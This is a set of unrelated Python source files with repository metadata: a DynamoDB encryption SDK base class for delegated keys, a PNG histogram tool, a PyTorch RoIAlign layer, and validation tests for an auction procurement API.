b41caeee14a7463da250e2f2b4b3ed0ef3e584b6 | 7,183 | py | Python | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | null | null | null | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | 1 | 2021-03-20T05:42:35.000Z | 2021-03-20T05:42:35.000Z | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Delegated keys."""
import abc
import six
from dynamodb_encryption_sdk.identifiers import EncryptionKeyType # noqa pylint: disable=unused-import
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Dict, Optional, Text # noqa pylint: disable=unused-import
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
__all__ = ("DelegatedKey",)
def _raise_not_implemented(method_name):
"""Raises a standardized :class:`NotImplementedError` to report that the specified method
is not supported.
:raises NotImplementedError: when called
"""
raise NotImplementedError('"{}" is not supported by this DelegatedKey'.format(method_name))
@six.add_metaclass(abc.ABCMeta)
class DelegatedKey(object):
    """Delegated keys are black boxes that encrypt, decrypt, sign, and verify data and wrap
    and unwrap keys. Not all delegated keys implement all methods.

    Unless overridden by a subclass, any method that a delegated key does not implement raises
    a :class:`NotImplementedError` detailing this.
    """

    @abc.abstractproperty
    def algorithm(self):
        # type: () -> Text
        """Text description of algorithm used by this delegated key."""

    @property
    def allowed_for_raw_materials(self):
        # type: () -> bool
        """Most delegated keys should not be used with :class:`RawDecryptionMaterials` or
        :class:`RawEncryptionMaterials`. Subclasses that may be used that way override this.

        :returns: False
        :rtype: bool
        """
        return False

    @classmethod
    def generate(cls, algorithm, key_length):  # type: ignore
        # type: (Text, int) -> DelegatedKey
        # pylint: disable=unused-argument,no-self-use
        """Generate an instance of this :class:`DelegatedKey` using the specified algorithm and key length.

        :param str algorithm: Text description of algorithm to be used
        :param int key_length: Size of key to generate
        :returns: Generated delegated key
        :rtype: DelegatedKey
        """
        _raise_not_implemented("generate")

    def encrypt(self, algorithm, name, plaintext, additional_associated_data=None):  # type: ignore
        # type: (Text, Text, bytes, Optional[Dict[Text, Text]]) -> bytes
        # pylint: disable=unused-argument,no-self-use
        """Encrypt data.

        :param str algorithm: Text description of algorithm to use to encrypt data
        :param str name: Name associated with plaintext data
        :param bytes plaintext: Plaintext data to encrypt
        :param dict additional_associated_data: Not used by all delegated keys, but if it
            is, then if it is provided on encrypt it must be required on decrypt.
        :returns: Encrypted ciphertext
        :rtype: bytes
        """
        _raise_not_implemented("encrypt")

    def decrypt(self, algorithm, name, ciphertext, additional_associated_data=None):  # type: ignore
        # type: (Text, Text, bytes, Optional[Dict[Text, Text]]) -> bytes
        # pylint: disable=unused-argument,no-self-use
        """Decrypt data.

        :param str algorithm: Text description of algorithm to use to decrypt data
        :param str name: Name associated with ciphertext data
        :param bytes ciphertext: Ciphertext data to decrypt
        :param dict additional_associated_data: Not used by all delegated keys, but if it
            is, then if it is provided on encrypt it must be required on decrypt.
        :returns: Decrypted plaintext
        :rtype: bytes
        """
        _raise_not_implemented("decrypt")

    def wrap(self, algorithm, content_key, additional_associated_data=None):  # type: ignore
        # type: (Text, bytes, Optional[Dict[Text, Text]]) -> bytes
        # pylint: disable=unused-argument,no-self-use
        """Wrap content key.

        :param str algorithm: Text description of algorithm to use to wrap key
        :param bytes content_key: Raw content key to wrap
        :param dict additional_associated_data: Not used by all delegated keys, but if it
            is, then if it is provided on wrap it must be required on unwrap.
        :returns: Wrapped key
        :rtype: bytes
        """
        _raise_not_implemented("wrap")

    def unwrap(  # type: ignore
        self, algorithm, wrapped_key, wrapped_key_algorithm, wrapped_key_type, additional_associated_data=None
    ):
        # type: (Text, bytes, Text, EncryptionKeyType, Optional[Dict[Text, Text]]) -> DelegatedKey
        # pylint: disable=unused-argument,no-self-use
        """Unwrap a wrapped content key.

        :param str algorithm: Text description of algorithm to use to unwrap key
        :param bytes wrapped_key: Wrapped key data to unwrap
        :param str wrapped_key_algorithm: Text description of algorithm for unwrapped key to use
        :param EncryptionKeyType wrapped_key_type: Type of key to treat key as once unwrapped
        :param dict additional_associated_data: Not used by all delegated keys, but if it
            is, then if it is provided on wrap it must be required on unwrap.
        :returns: Delegated key using unwrapped key
        :rtype: DelegatedKey
        """
        _raise_not_implemented("unwrap")

    def sign(self, algorithm, data):  # type: ignore
        # type: (Text, bytes) -> bytes
        # pylint: disable=unused-argument,no-self-use
        """Sign data.

        :param str algorithm: Text description of algorithm to use to sign data
        :param bytes data: Data to sign
        :returns: Signature value
        :rtype: bytes
        """
        _raise_not_implemented("sign")

    def verify(self, algorithm, signature, data):  # type: ignore
        # type: (Text, bytes, bytes) -> None
        # pylint: disable=unused-argument,no-self-use
        """Verify a signature over data.

        :param str algorithm: Text description of algorithm to use to verify signature
        :param bytes signature: Signature to verify
        :param bytes data: Data over which to verify signature
        """
        _raise_not_implemented("verify")

    def signing_algorithm(self):  # type: ignore
        # type: () -> Text
        # pylint: disable=no-self-use
        """Provide a description that can inform an appropriate cryptographic materials
        provider about how to build a :class:`DelegatedKey` for signature verification.

        If implemented, the return value of this method is included in the material description
        written to the encrypted item.

        :returns: Signing algorithm identifier
        :rtype: str
        """
        _raise_not_implemented("signing_algorithm")
03a56608307d0d70cb834db624a458069a8a7ffd | 1,775 | py | Python | src/tools/tile_hist.py | Vizzuality/DeforestationAnalysisTool | 30ce145404a333fecab05898053981f782a8e432 | [
"MIT",
"BSD-3-Clause"
] | 5 | 2018-05-28T08:02:11.000Z | 2022-01-22T11:34:08.000Z | src/tools/tile_hist.py | ImazonSadGoogle/DeforestationAnalysisTool | 1d2fd5f13b06265f8c043f44064c453f8d662086 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | src/tools/tile_hist.py | ImazonSadGoogle/DeforestationAnalysisTool | 1d2fd5f13b06265f8c043f44064c453f8d662086 | [
"MIT",
"BSD-3-Clause"
] | 3 | 2016-01-18T09:37:14.000Z | 2020-07-10T10:57:56.000Z |
import sys
import Image
from os import walk
from os.path import join
from itertools import chain
from collections import defaultdict
from multiprocessing import Pool
from pipe import Pipe
def image_hist(image_path):
hist = defaultdict(float)
try:
i = Image.open(image_path)
except IOError:
print "failed to open %s" % image_path
return hist
pixels = list(i.getdata())
# optimize not repeating if inside
if len(i.getbands()) == 1:
for p in range(0, len(pixels)):
u = pixels[p]
hist[u] += 1.0
else:
for p in range(0, len(pixels)):
u = pixels[p][0]
hist[u] += 1.0
return hist
@Pipe
def accum_hist(image_hist):
curr = 0
hist = defaultdict(float)
for h in image_hist:
curr+=1
if curr%100 == 0:
print curr
for x in h:
hist[x] += h[x]
return hist
def files(folder):
    """Yield the full path of every file found beneath *folder*."""
    for dirpath, _dirnames, filenames in walk(folder):
        for filename in filenames:
            yield join(dirpath, filename)
@Pipe
def filter_by_ext(iterable, ext):
    """Yield only the items whose names end with the given extension."""
    return (item for item in iterable if item.endswith(ext))
@Pipe
def parallel(iterable, fn, processes=2):
    """Apply *fn* to each item using a process pool, yielding results as they finish."""
    workers = Pool(processes=processes)
    results = workers.imap_unordered(fn, iterable, chunksize=10)
    for item in results:
        yield item
@Pipe
def print_hist(hist):
for x in hist:
print x, hist[x]
if __name__ == '__main__':
    # Walk the folder given on the command line, histogram every .png in
    # parallel, merge the per-image histograms, and print the result.
    files(sys.argv[1]) | filter_by_ext('.png') | parallel(image_hist) | accum_hist | print_hist
    # The string below is the pre-pipe implementation kept for reference;
    # it is a dead expression statement and is never executed.
    """
    pool = Pool(processes=2)
    # map
    proccessed = pool.imap_unordered(image_hist, files(sys.argv[1]), chunksize=10)
    # reduce
    hist = accum_hist(proccessed)
    for x in hist:
        print x, hist[x]
    """
| 22.1875 | 95 | 0.588732 |
a6076cde61f1c09f0d21e196d1e2f3219bd1ac79 | 1,984 | py | Python | lib/models/roi_align/roi_align/roi_align.py | liuqk3/GSM | 188965b3a11f9cdbe166d79cac7cd2e9fb4c1785 | [
"MIT"
] | 3 | 2021-06-16T13:06:27.000Z | 2021-12-27T03:52:51.000Z | models/planercnn/roi_align/roi_align.py | namanshrimali/doepd.ai | fc57af2e131965d9d6c89e39a3eeab41c8dff40b | [
"MIT"
] | 5 | 2021-08-25T16:16:51.000Z | 2022-03-12T00:57:46.000Z | models/planercnn/roi_align/roi_align.py | namanshrimali/doepd.ai | fc57af2e131965d9d6c89e39a3eeab41c8dff40b | [
"MIT"
] | 1 | 2021-12-01T13:31:38.000Z | 2021-12-01T13:31:38.000Z | import torch
from torch import nn
from .crop_and_resize import CropAndResizeFunction, CropAndResize
class RoIAlign(nn.Module):
    """RoIAlign layer: pools a fixed-size feature crop for each box via crop_and_resize."""

    def __init__(self, crop_height, crop_width, extrapolation_value=0, transform_fpcoor=True):
        # crop_height / crop_width: output spatial size for each pooled box.
        # extrapolation_value: fill value for samples outside the image.
        # transform_fpcoor: when True, use the feature-pixel-coordinate box
        # transform from tensorpack's RoIAlign (see forward) instead of
        # naive corner normalization.
        super(RoIAlign, self).__init__()

        self.crop_height = crop_height
        self.crop_width = crop_width
        self.extrapolation_value = extrapolation_value
        self.transform_fpcoor = transform_fpcoor

    def forward(self, featuremap, boxes, box_ind):
        """
        RoIAlign based on crop_and_resize.
        See more details on https://github.com/ppwwyyxx/tensorpack/blob/6d5ba6a970710eaaa14b89d24aace179eb8ee1af/examples/FasterRCNN/model.py#L301
        :param featuremap: NxCxHxW
        :param boxes: Mx4 float box with (x1, y1, x2, y2) **without normalization**
        :param box_ind: M (presumably the batch index of each box -- confirm
            against CropAndResizeFunction)
        :return: MxCxoHxoW
        """
        x1, y1, x2, y2 = torch.split(boxes, 1, dim=1)
        image_height, image_width = featuremap.size()[2:4]

        if self.transform_fpcoor:
            # Sample at pixel centers: spacing is the stride between sample
            # points; the +spacing/2 - 0.5 shift converts corner coordinates
            # to sample-center coordinates before normalizing over (size - 1).
            spacing_w = (x2 - x1) / float(self.crop_width)
            spacing_h = (y2 - y1) / float(self.crop_height)

            nx0 = (x1 + spacing_w / 2 - 0.5) / float(image_width - 1)
            ny0 = (y1 + spacing_h / 2 - 0.5) / float(image_height - 1)
            nw = spacing_w * float(self.crop_width - 1) / float(image_width - 1)
            nh = spacing_h * float(self.crop_height - 1) / float(image_height - 1)

            # crop_and_resize takes boxes ordered (y1, x1, y2, x2).
            boxes = torch.cat((ny0, nx0, ny0 + nh, nx0 + nw), 1)
        else:
            # Naive normalization of corner coordinates to [0, 1].
            x1 = x1 / float(image_width - 1)
            x2 = x2 / float(image_width - 1)
            y1 = y1 / float(image_height - 1)
            y2 = y2 / float(image_height - 1)
            boxes = torch.cat((y1, x1, y2, x2), 1)

        # Detach so gradients do not flow into the box coordinates.
        boxes = boxes.detach().contiguous()
        box_ind = box_ind.detach()
        return CropAndResizeFunction.apply(featuremap, boxes, box_ind, self.crop_height, self.crop_width, self.extrapolation_value)
bf6fcc361f0c04fa007014f555fbdd35c528747f | 48,008 | py | Python | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from copy import deepcopy
from hashlib import sha512
from uuid import uuid4
from datetime import timedelta
from iso8601 import parse_date
import pytz
from openprocurement.auctions.core.tests.base import JSON_RENDERER_ERROR
from openprocurement.auctions.core.utils import (
SANDBOX_MODE, TZ, get_now
)
from openprocurement.auctions.appraisal.constants import (
CONTRACT_TYPES
)
# AppraisalAuctionTest
def create_role(self):
    """Check which model fields are hidden from the 'create' serialization role."""
    expected_hidden = {
        'awardCriteriaDetails', 'awardCriteriaDetails_en', 'awardCriteriaDetails_ru',
        'description', 'description_en', 'description_ru', 'tenderAttempts',
        'features', 'guarantee', 'hasEnquiries', 'items', 'lots', 'minimalStep', 'mode',
        'procurementMethodRationale', 'procurementMethodRationale_en', 'procurementMethodRationale_ru',
        'procurementMethodType', 'procuringEntity', 'status',
        'submissionMethodDetails', 'submissionMethodDetails_en', 'submissionMethodDetails_ru',
        'title', 'title_en', 'title_ru', 'value', 'auctionPeriod', 'lotIdentifier',
        'auctionParameters', 'bankAccount', 'registrationFee',
    }
    # procurementMethodDetails only exists on the model when sandbox mode is on
    if SANDBOX_MODE:
        expected_hidden.add('procurementMethodDetails')
    create_fields = self.auction._options.roles['create'].fields
    self.assertEqual(set(self.auction._fields) - create_fields, expected_hidden)
def edit_role(self):
    """Check which fields the 'edit_active.tendering' serialization role exposes."""
    editable = {
        'bankAccount', 'description', 'title', 'title_en', 'title_ru',
        'minimalStep', 'items', 'tenderAttempts', 'description_en',
        'description_ru', 'registrationFee', 'guarantee', 'hasEnquiries',
        'lotIdentifier', 'features', 'value',
    }
    if SANDBOX_MODE:
        editable.add('procurementMethodDetails')
    role = self.auction._options.roles['edit_active.tendering']
    model_fields = set(self.auction._fields)
    # The role may be declared either as a blacklist (fields to hide) or a
    # whitelist (fields to show); compare the appropriate set either way.
    if role.function.__name__ == 'blacklist':
        self.assertEqual(model_fields - role.fields, editable)
    else:
        self.assertEqual(model_fields & role.fields, editable)
# AppraisalAuctionResourceTest
def create_auction_invalid(self):
    """Malformed auction-creation payloads must be rejected with precise errors.

    Walks through a series of invalid POST /auctions requests (wrong content
    type, missing or mistyped body, rogue fields, inconsistent periods,
    missing contact data) and checks the exact error payload for each.
    Several historical checks are kept commented out below.
    """
    request_path = '/auctions'
    # a non-JSON content type is rejected outright with 415
    response = self.app.post(request_path, 'data', status=415)
    self.assertEqual(response.status, '415 Unsupported Media Type')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description':
            u"Content-Type header should be one of ['application/json']", u'location': u'header', u'name': u'Content-Type'}
    ])
    # JSON content type but a body that is not valid JSON
    response = self.app.post(
        request_path, 'data', content_type='application/json', status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        JSON_RENDERER_ERROR
    ])
    # valid JSON, but a bare string instead of an object
    response = self.app.post_json(request_path, 'data', status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # object without the mandatory 'data' key
    response = self.app.post_json(request_path, {'not_data': {}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # 'data' of the wrong type (list instead of mapping)
    response = self.app.post_json(request_path, {'data': []}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # unknown procurementMethodType is a 415, not a validation error
    response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'invalid_value'}}, status=415)
    self.assertEqual(response.status, '415 Unsupported Media Type')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'procurementMethodType is not implemented', u'location': u'body', u'name': u'data'}
    ])
    # a field the model does not declare is flagged as rogue
    response = self.app.post_json(request_path, {'data': {'invalid_field': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Rogue field', u'location':
            u'body', u'name': u'invalid_field'}
    ])
    # scalar where a Value mapping is expected
    response = self.app.post_json(request_path, {'data': {'value': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': [
            u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body', u'name': u'value'}
    ])
    # invalid procurementMethod also surfaces the required-field errors
    response = self.app.post_json(request_path, {'data': {'procurementMethod': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertIn({u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body', u'name': u'procurementMethod'}, response.json['errors'])
    #self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'tenderPeriod'}, response.json['errors'])
    # self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'minimalStep'}, response.json['errors'])
    #self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'enquiryPeriod'}, response.json['errors'])
    self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'}, response.json['errors'])
    # unparseable enquiryPeriod end date
    response = self.app.post_json(request_path, {'data': {'enquiryPeriod': {'endDate': 'invalid_value'}, 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'endDate': [u"Could not parse invalid_value. Should be ISO8601."]}, u'location': u'body', u'name': u'enquiryPeriod'}
    ])
    # enquiryPeriod end date past datetime's representable range
    response = self.app.post_json(request_path, {'data': {'enquiryPeriod': {'endDate': '9999-12-31T23:59:59.999999'}, 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'endDate': [u'date value out of range']}, u'location': u'body', u'name': u'enquiryPeriod'}
    ])
    # tenderPeriod supplied instead of auctionPeriod: auctionPeriod.startDate required
    self.initial_data['tenderPeriod'] = self.initial_data.pop('auctionPeriod')
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data['auctionPeriod'] = self.initial_data.pop('tenderPeriod')
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'startDate': [u'This field is required.']}, u'location': u'body', u'name': u'auctionPeriod'}
    ])
    # tenderPeriod that ends before it starts
    self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2014-10-01T00:00:00'}
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data.pop('tenderPeriod')
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'startDate': [u'period should begin before its end']}, u'location': u'body', u'name': u'tenderPeriod'}
    ])
    #data = self.initial_data['tenderPeriod']
    #self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2015-10-01T00:00:00'}
    #response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    #self.initial_data['tenderPeriod'] = data
    #self.assertEqual(response.status, '422 Unprocessable Entity')
    #self.assertEqual(response.content_type, 'application/json')
    #self.assertEqual(response.json['status'], 'error')
    #self.assertEqual(response.json['errors'], [
    #{u'description': [u'period should begin after enquiryPeriod'], u'location': u'body', u'name': u'tenderPeriod'}
    #])
    now = get_now()
    #self.initial_data['awardPeriod'] = {'startDate': now.isoformat(), 'endDate': now.isoformat()}
    #response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    #del self.initial_data['awardPeriod']
    #self.assertEqual(response.status, '422 Unprocessable Entity')
    #self.assertEqual(response.content_type, 'application/json')
    #self.assertEqual(response.json['status'], 'error')
    #self.assertEqual(response.json['errors'], [
    #{u'description': [u'period should begin after tenderPeriod'], u'location': u'body', u'name': u'awardPeriod'}
    #])
    # awardPeriod placed before the auctionPeriod must be rejected
    data = self.initial_data['auctionPeriod']
    self.initial_data['auctionPeriod'] = {'startDate': (now + timedelta(days=15)).isoformat(), 'endDate': (now + timedelta(days=15)).isoformat()}
    self.initial_data['awardPeriod'] = {'startDate': (now + timedelta(days=14)).isoformat(), 'endDate': (now + timedelta(days=14)).isoformat()}
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data['auctionPeriod'] = data
    del self.initial_data['awardPeriod']
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': [u'period should begin after auctionPeriod'], u'location': u'body', u'name': u'awardPeriod'}
    ])
    #
    # data = self.initial_data['minimalStep']
    # self.initial_data['minimalStep'] = {'amount': '1000.0'}
    # response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    # self.initial_data['minimalStep'] = data
    # self.assertEqual(response.status, '422 Unprocessable Entity')
    # self.assertEqual(response.content_type, 'application/json')
    # self.assertEqual(response.json['status'], 'error')
    # self.assertEqual(response.json['errors'], [
    #     {u'description': [u'value should be less than value of auction'], u'location': u'body', u'name': u'minimalStep'}
    # ])
    #
    # data = self.initial_data['minimalStep']
    # self.initial_data['minimalStep'] = {'amount': '100.0', 'valueAddedTaxIncluded': False}
    # response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    # self.initial_data['minimalStep'] = data
    # self.assertEqual(response.status, '422 Unprocessable Entity')
    # self.assertEqual(response.content_type, 'application/json')
    # self.assertEqual(response.json['status'], 'error')
    # self.assertEqual(response.json['errors'], [
    #     {u'description': [u'valueAddedTaxIncluded should be identical to valueAddedTaxIncluded of value of auction'], u'location': u'body', u'name': u'minimalStep'}
    # ])
    #
    # data = self.initial_data['minimalStep']
    # self.initial_data['minimalStep'] = {'amount': '100.0', 'currency': "USD"}
    # response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    # self.initial_data['minimalStep'] = data
    # self.assertEqual(response.status, '422 Unprocessable Entity')
    # self.assertEqual(response.content_type, 'application/json')
    # self.assertEqual(response.json['status'], 'error')
    # self.assertEqual(response.json['errors'], [
    #     {u'description': [u'currency should be identical to currency of value of auction'], u'location': u'body', u'name': u'minimalStep'}
    # ])
    #
    # auction_data = deepcopy(self.initial_data)
    # auction_data['value'] = {'amount': '100.0', 'currency': "USD"}
    # auction_data['minimalStep'] = {'amount': '5.0', 'currency': "USD"}
    # response = self.app.post_json(request_path, {'data': auction_data}, status=422)
    # self.assertEqual(response.status, '422 Unprocessable Entity')
    # self.assertEqual(response.content_type, 'application/json')
    # self.assertEqual(response.json['status'], 'error')
    # self.assertEqual(response.json['errors'], [
    #     {u'description': [u'currency should be only UAH'], u'location': u'body', u'name': u'value'}
    # ])
    # procuringEntity must have at least one of telephone / email
    data = self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
    del self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["procuringEntity"]["contactPoint"]["telephone"] = data
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}}, u'location': u'body', u'name': u'procuringEntity'}
    ])
def create_auction_auctionPeriod(self):
    """The submitted auctionPeriod.startDate becomes shouldStartAfter on the
    created auction, and tenderPeriod is derived from it by the server.
    """
    data = self.initial_data.copy()
    #tenderPeriod = data.pop('tenderPeriod')
    #data['auctionPeriod'] = {'startDate': tenderPeriod['endDate']}
    response = self.app.post_json('/auctions', {'data': data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    auction = response.json['data']
    self.assertIn('tenderPeriod', auction)
    self.assertIn('auctionPeriod', auction)
    # the raw startDate is not echoed back; it is converted to shouldStartAfter
    self.assertNotIn('startDate', auction['auctionPeriod'])
    self.assertEqual(parse_date(data['auctionPeriod']['startDate']).date(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).date())
    if SANDBOX_MODE:
        # sandbox mode compresses the procedure timeline, so only check that
        # the auction starts shortly (<= 70s) after tendering ends; naive
        # datetimes are localized to TZ before subtracting
        auction_startDate = parse_date(data['auctionPeriod']['startDate'], None)
        if not auction_startDate.tzinfo:
            auction_startDate = TZ.localize(auction_startDate)
        tender_endDate = parse_date(auction['tenderPeriod']['endDate'], None)
        if not tender_endDate.tzinfo:
            tender_endDate = TZ.localize(tender_endDate)
        self.assertLessEqual((auction_startDate - tender_endDate).total_seconds(), 70)
    else:
        # normal mode: tendering ends the same day the auction should start,
        # strictly before the shouldStartAfter time of day
        self.assertEqual(parse_date(auction['tenderPeriod']['endDate']).date(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).date())
        self.assertGreater(parse_date(auction['tenderPeriod']['endDate']).time(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).time())
def create_auction_generated(self):
    """Server-generated identifiers must override any client-supplied ones.

    Posts a payload that tries to set `id`, `doc_id` and `auctionID` and
    verifies the created auction carries fresh server-side values instead.
    """
    document = {
        'id': '1' * 32,
        'documentType': 'x_dgfAssetFamiliarization',
        'title': u'\u0443\u043a\u0440.doc',
        'accessDetails': 'access details',
        'format': 'application/msword',
        'datePublished': get_now().isoformat(),
        'dateModified': get_now().isoformat(),
    }
    data = self.initial_data.copy()
    data['documents'] = [document]
    #del data['awardPeriod']
    # client-chosen identifiers that the server must ignore
    data.update({'id': 'hash', 'doc_id': 'hash2', 'auctionID': 'hash3'})
    response = self.app.post_json('/auctions', {'data': data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    auction = response.json['data']
    # these two keys are only present in some configurations, so drop them
    # before comparing the exact field set
    for key in ['procurementMethodDetails', 'submissionMethodDetails']:
        if key in auction:
            auction.pop(key)
    self.assertEqual(set(auction), set([
        u'procurementMethodType', u'id', u'date', u'dateModified', u'auctionID', u'status', u'enquiryPeriod',
        u'tenderPeriod', u'minimalStep', u'items', u'value', u'procuringEntity', u'next_check',
        u'procurementMethod', u'awardCriteria', u'submissionMethod', u'title', u'owner', u'auctionPeriod',
        u'tenderAttempts', u'auctionParameters', u'bankAccount', u'registrationFee', u'lotIdentifier'
    ]))
    self.assertNotEqual(data['id'], auction['id'])
    self.assertNotEqual(data['doc_id'], auction['id'])
    self.assertNotEqual(data['auctionID'], auction['auctionID'])
    # Check all field of document in post data appear in created auction
    # NOTE(review): the check described above is not implemented — the field
    # set asserted earlier does not even include 'documents'; confirm whether
    # documents are intentionally dropped on create or the check is missing.
def create_auction(self):
    """Happy-path auction creation.

    Verifies: the listing starts empty, POST /auctions returns the expected
    server-generated fields, the auction is readable back unchanged, JSONP
    and pretty-print response variants work, and a client-supplied guarantee
    is preserved.
    """
    response = self.app.get('/auctions')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 0)
    response = self.app.post_json('/auctions', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    auction = response.json['data']
    # The expected set of server-generated fields is the same for financial
    # and non-financial organizations, so no branching on organization type
    # is needed (the original if/else branches were byte-identical).
    self.assertEqual(set(auction) - set(self.initial_data), set([
        u'id', u'dateModified', u'auctionID', u'date', u'status', u'procurementMethod',
        u'awardCriteria', u'submissionMethod', u'next_check', u'owner', u'enquiryPeriod', u'tenderPeriod',
        u'minimalStep'
    ]))
    self.assertIn(auction['id'], response.headers['Location'])
    # the created auction can be read back unchanged
    response = self.app.get('/auctions/{}'.format(auction['id']))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(set(response.json['data']), set(auction))
    self.assertEqual(response.json['data'], auction)
    # JSONP wrapper via opt_jsonp
    response = self.app.post_json('/auctions?opt_jsonp=callback', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
